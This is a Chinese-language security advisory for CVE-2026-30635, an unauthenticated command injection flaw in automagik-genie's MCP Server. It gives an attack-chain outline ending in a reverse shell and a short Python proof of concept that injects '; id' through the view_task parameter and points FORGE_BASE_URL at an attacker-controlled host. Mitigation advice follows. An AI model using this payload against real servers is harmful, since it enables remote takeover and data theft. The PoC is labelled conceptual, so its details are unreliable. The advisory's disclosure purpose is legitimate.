CVE-2026-30635 CVSS 8.1 高危

CVE-2026-30635 automagik-genie命令注入漏洞

披露日期: 2026-05-11

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-30635

漏洞类型

命令注入

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

automagik-genie

漏洞概述

automagik-genie 2.5.27版本MCP Server存在严重的命令注入漏洞。漏洞位于`readTranscriptFromCommit`函数，处理外部`FORGE_BASE_URL`请求时未过滤`view_task`参数。攻击者可利用此漏洞在无需认证的情况下远程执行任意系统命令，完全控制服务器，威胁极高。

技术细节

该漏洞的核心在于automagik-genie的MCP Server在处理`readTranscriptFromCommit`逻辑时存在严重的输入验证缺失。具体来说，当服务器接收到包含`view_task`（别名`view`）参数的请求时，会直接将其值传递给底层系统命令执行环境，而未进行任何安全转义或过滤。攻击者可以通过构造特殊的恶意载荷（如利用分号、反引号或管道符连接的Shell命令），利用外部`FORGE_BASE_URL`作为触发点，欺骗服务器执行攻击者指定的操作系统命令。CVSS 3.1评分为8.1，属于高危漏洞。由于该漏洞无需用户交互和身份验证，攻击者可轻易通过公网发起攻击，获取服务器最高权限，进而窃取敏感数据、植入木马后门或破坏系统服务。

攻击链分析

STEP 1

侦察

攻击者识别互联网上暴露的automagik-genie MCP Server服务（通常在特定端口）。

STEP 2

构造载荷

攻击者针对`readTranscriptFromCommit`函数构造包含恶意Shell命令的`view_task`参数。

STEP 3

发送请求

攻击者向目标服务器发送特制的HTTP请求，设置恶意的`FORGE_BASE_URL`并注入载荷。

STEP 4

命令执行

服务器解析请求，将未过滤的参数传递给系统Shell，导致恶意命令在服务器端执行。

STEP 5

建立控制

攻击者利用执行的命令反弹Shell或上传后门，获取服务器的完全控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept (Conceptual)
import requests
import json

target = "http://target-host:port"
url = f"{target}/api/mcp/readTranscriptFromCommit"

# Malicious payload to execute 'id' command
payload = "; id"

headers = {"Content-Type": "application/json"}
data = {
    "view_task": payload,
    "FORGE_BASE_URL": "http://attacker-controlled.com"
}

try:
    response = requests.post(url, headers=headers, data=json.dumps(data))
    print(f"Status Code: {response.status_code}")
    print("Response:")
    print(response.text)
except Exception as e:
    print(f"Error: {e}")

影响范围

automagik-genie 2.5.27

防御指南

临时缓解措施

建议立即检查并限制automagik-genie服务器的对外网络访问，在防火墙层面阻断非必要的入站连接。如果无法立即升级，应暂时禁用涉及外部`FORGE_BASE_URL`读取的功能模块，并密切监控系统日志中是否存在异常的进程调用或Shell命令执行记录。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表